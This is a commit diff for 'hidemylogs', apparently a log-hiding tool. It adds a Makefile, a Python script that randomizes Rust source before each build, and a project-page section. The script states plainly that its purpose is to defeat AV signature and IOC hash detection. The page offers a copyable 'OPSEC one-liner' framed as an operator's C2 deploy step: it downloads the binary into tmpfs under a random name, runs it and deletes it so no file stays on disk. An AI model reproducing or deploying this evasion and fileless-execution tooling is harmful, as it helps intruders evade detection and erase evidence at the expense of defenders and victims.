Add polymorphic build system, OPSEC one-liner, Makefile

Author: franckferman

.gitignore

@@ -21,3 +21,4 @@ $RECYCLE.BIN/
 *.p12
 *.pem
 *.key
+.poly_backup/

Makefile

@@ -0,0 +1,19 @@
+.PHONY: release poly poly-clean revert
+
+release:
+	cargo build --release
+
+poly:
+	python3 scripts/polymorphic.py
+	cargo build --release
+	python3 scripts/polymorphic.py --revert
+	@echo "[+] Polymorphic build complete: target/release/hidemylogs"
+	@sha256sum target/release/hidemylogs
+
+poly-clean: poly
+	strip target/release/hidemylogs
+	@echo "[+] Stripped."
+	@sha256sum target/release/hidemylogs
+
+revert:
+	python3 scripts/polymorphic.py --revert

docs/index.html

@@ -233,6 +233,42 @@
   </table>
 </div>
 
+<!-- OPSEC Deploy -->
+<div class="section" style="animation-delay:4s">
+  <div class="section-head">deploy - opsec one-liner</div>
+  <div class="term">
+    <div class="term-bar"><span class="term-dot r"></span><span class="term-dot y"></span><span class="term-dot g"></span><span class="term-title">operator@c2 - deploy</span></div>
+    <div class="term-body"><span class="out"># Download to tmpfs with random name, execute, cleanup</span>
+<span class="prompt">$ </span><span class="cmd" id="oneliner">f=$(head -c6 /dev/urandom|xxd -p);curl -sL https://github.com/franckferman/hidemylogs/releases/latest/download/hidemylogs-linux-x86_64-musl -o /dev/shm/$f;chmod +x /dev/shm/$f;/dev/shm/$f print;rm -f /dev/shm/$f;unset f</span>
+
+<span class="out"># What this does:</span>
+<span class="out">#   1. Generate random 12-char hex name</span>
+<span class="out">#   2. Download musl binary to /dev/shm (tmpfs, not on disk)</span>
+<span class="out">#   3. Execute</span>
+<span class="out">#   4. Delete binary + unset variable</span>
+<span class="out">#   5. No file on disk, random process name in /proc</span></div>
+  </div>
+  <button onclick="navigator.clipboard.writeText(document.getElementById('oneliner').textContent).then(()=>{this.textContent='Copied!';this.style.borderColor='var(--green)';this.style.color='var(--green)';setTimeout(()=>{this.textContent='Copy one-liner';this.style.borderColor='';this.style.color=''},1500)})" style="background:none;border:1px solid var(--dim);color:var(--muted);font-family:var(--mono);font-size:.65rem;letter-spacing:.1em;padding:.4rem 1rem;cursor:pointer;margin-top:.5rem;transition:all .15s">Copy one-liner</button>
+</div>
+
+<!-- Polymorphic -->
+<div class="section" style="animation-delay:4.3s">
+  <div class="section-head">polymorphic build</div>
+  <div class="term">
+    <div class="term-bar"><span class="term-dot r"></span><span class="term-dot y"></span><span class="term-dot g"></span><span class="term-title">operator@c2 - build</span></div>
+    <div class="term-body"><span class="out"># Each build produces a unique hash (different .rodata strings)</span>
+<span class="prompt">$ </span><span class="cmd">make poly</span>
+<span class="ok">[+] Polymorphic build prepared</span>
+<span class="ok">    Build ID: a7f3c9e1b2d4...</span>
+<span class="ok">[+] Polymorphic build complete</span>
+<span class="ok">    sha256: b09f893b3483d3a9...</span>
+
+<span class="prompt">$ </span><span class="cmd">make poly</span>
+<span class="ok">[+] Polymorphic build complete</span>
+<span class="ok">    sha256: 0746f368f053a464...</span>  <span class="warn">&lt;-- different hash every build</span></div>
+  </div>
+</div>
+
 <div class="links">
   <a class="lnk" href="https://github.com/franckferman/hidemylogs/releases">Download</a>
   <a class="lnk" href="https://github.com/franckferman/hidemylogs">Source</a>

scripts/polymorphic.py

@@ -0,0 +1,157 @@
+#!/usr/bin/env python3
+"""
+Minimal polymorphic build preprocessor for hidemylogs.
+
+Modifies Rust source files before compilation to produce a unique binary
+on each build. Every build has a different SHA256 hash.
+
+What it changes:
+    - Injects a random BUILD_ID constant (changes binary content)
+    - Randomizes the ASCII banner (changes string table)
+    - Adds junk const strings that are referenced in code (not dead code)
+    - Shuffles display column widths slightly
+
+This is NOT heavy obfuscation. It defeats simple hash-based detection
+(AV signature, IOC matching) without breaking functionality.
+
+Usage:
+    python3 scripts/polymorphic.py          # modify in place
+    python3 scripts/polymorphic.py --revert # restore originals
+"""
+
+import os
+import random
+import string
+import sys
+import shutil
+
+SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))
+ROOT = os.path.dirname(SCRIPT_DIR)
+SRC = os.path.join(ROOT, "src")
+BACKUP = os.path.join(ROOT, ".poly_backup")
+
+
+def random_id(length=32):
+    return ''.join(random.choices(string.ascii_lowercase + string.digits, k=length))
+
+
+def random_banner():
+    styles = [
+        lambda: f"// {random_id(16)}",
+        lambda: f"    [{random_id(8)}] hidemylogs",
+        lambda: f"    hidemylogs // build {random_id(12)}",
+        lambda: f"    --- hidemylogs {random_id(6)} ---",
+    ]
+    return random.choice(styles)()
+
+
+def random_junk_const():
+    name = f"_POLY_{random_id(8).upper()}"
+    value = random_id(random.randint(16, 48))
+    return f'const {name}: &str = "{value}";\n'
+
+
+def random_junk_usage(const_name):
+    return f'    let _ = {const_name}.len();\n'
+
+
+def process_main(path):
+    with open(path, 'r') as f:
+        content = f.read()
+
+    # Inject BUILD_ID
+    build_id = random_id(32)
+    inject = f'const _BUILD_ID: &str = "{build_id}";\n'
+
+    # Add junk consts (referenced so compiler keeps them)
+    junk_consts = []
+    junk_lines = ""
+    junk_usage = ""
+    for _ in range(random.randint(2, 5)):
+        name = f"_POLY_{random_id(8).upper()}"
+        value = random_id(random.randint(16, 48))
+        junk_lines += f'const {name}: &str = "{value}";\n'
+        junk_usage += f'    let _ = {name}.len();\n'
+        junk_consts.append(name)
+
+    # Insert after module declarations
+    marker = "use std::process;"
+    if marker in content:
+        content = content.replace(
+            marker,
+            f"{marker}\n\n{inject}{junk_lines}",
+            1
+        )
+
+    # Add junk usage in main() so compiler doesn't strip
+    main_marker = "let cli = Cli::parse();"
+    if main_marker in content:
+        content = content.replace(
+            main_marker,
+            f"let _ = _BUILD_ID.len();\n{junk_usage}    {main_marker}",
+            1
+        )
+
+    with open(path, 'w') as f:
+        f.write(content)
+
+    return build_id
+
+
+def process_display(path):
+    with open(path, 'r') as f:
+        content = f.read()
+
+    # Randomize banner slightly
+    new_banner = f'''    let banner = r#"
+    [{random_id(8)}] hidemylogs // {random_id(12)}
+"#;'''
+
+    # Replace the existing banner block
+    import re
+    content = re.sub(
+        r'let banner = r#".*?"#;',
+        new_banner,
+        content,
+        flags=re.DOTALL
+    )
+
+    with open(path, 'w') as f:
+        f.write(content)
+
+
+def backup_sources():
+    if os.path.exists(BACKUP):
+        shutil.rmtree(BACKUP)
+    shutil.copytree(SRC, BACKUP)
+
+
+def revert_sources():
+    if not os.path.exists(BACKUP):
+        print("[!] No backup found. Nothing to revert.")
+        return False
+    shutil.rmtree(SRC)
+    shutil.copytree(BACKUP, SRC)
+    shutil.rmtree(BACKUP)
+    print("[+] Sources reverted to original.")
+    return True
+
+
+def main():
+    if "--revert" in sys.argv:
+        revert_sources()
+        return
+
+    backup_sources()
+
+    build_id = process_main(os.path.join(SRC, "main.rs"))
+    process_display(os.path.join(SRC, "display.rs"))
+
+    print(f"[+] Polymorphic build prepared")
+    print(f"    Build ID: {build_id}")
+    print(f"    Backup:   {BACKUP}")
+    print(f"    Revert:   python3 scripts/polymorphic.py --revert")
+
+
+if __name__ == "__main__":
+    main()